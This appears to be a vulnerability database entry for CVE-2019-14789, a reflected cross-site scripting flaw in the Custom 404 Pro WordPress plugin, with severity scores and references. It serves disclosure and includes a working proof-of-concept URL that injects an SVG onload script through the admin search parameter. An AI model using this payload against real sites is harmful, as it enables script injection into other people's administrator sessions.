ID WPEX-ID:9382
Type wpexploit
Reporter
Modified 2020-09-22T07:28:35
Description
The Custom 404 Pro WordPress plugin was affected by an Authenticated Reflected XSS security vulnerability.
Version <= 3.2.7: /wp-admin/admin.php?page=c4p-main&s="><svg/onload=alert(/XSS/)>
{"id": "WPEX-ID:9382", "type": "wpexploit", "bulletinFamily": "exploit", "title": "Custom 404 Pro < 3.2.9 - Authenticated Reflected XSS", "description": "The Custom 404 Pro WordPress plugin was affected by an Authenticated Reflected XSS security vulnerability.\n", "published": "2019-06-24T00:00:00", "modified": "2020-09-22T07:28:35", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "", "reporter": "", "references": ["https://plugins.trac.wordpress.org/changeset?reponame=&new=2112485%40custom-404-pro&old=2087395%40custom-404-pro"], "cvelist": ["CVE-2019-14789"], "lastseen": "2020-12-09T20:34:20", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-14789"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:9382"]}], "modified": "2020-12-09T20:34:20", "rev": 2}, "score": {"value": 5.2, "vector": "NONE", "modified": "2020-12-09T20:34:20", "rev": 2}, "vulnersScore": 5.2}, "sourceData": "Version <= 3.2.7: /wp-admin/admin.php?page=c4p-main&s=\"><svg/onload=alert(/XSS/)>"}
{"cve": [{"lastseen": "2020-10-03T13:38:44", "description": "The Custom 404 Pro plugin 3.2.8 for WordPress has XSS via the wp-admin/admin.php?page=c4p-main page parameter.", "edition": 4, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-08-15T16:15:00", "title": "CVE-2019-14789", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14789"], "modified": "2019-08-20T18:45:00", "cpe": ["cpe:/a:custom_404_pro_project:custom_404_pro:3.2.8"], "id": "CVE-2019-14789", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14789", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:custom_404_pro_project:custom_404_pro:3.2.8:*:*:*:*:wordpress:*:*"]}], "wpvulndb": [{"lastseen": "2020-12-09T20:34:20", "bulletinFamily": "software", "cvelist": ["CVE-2019-14789"], "description": "The Custom 404 Pro WordPress plugin was affected by an Authenticated Reflected XSS security vulnerability.\n\n### PoC\n\nVersion <= 3.2.7: /wp-admin/admin.php?page=c4p-main&s;=\">\n", "modified": "2020-09-22T07:28:35", "published": "2019-06-24T00:00:00", "id": "WPVDB-ID:9382", "href": "https://wpvulndb.com/vulnerabilities/9382", "type": "wpvulndb", "title": "Custom 404 Pro < 3.2.9 - Authenticated Reflected XSS", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}
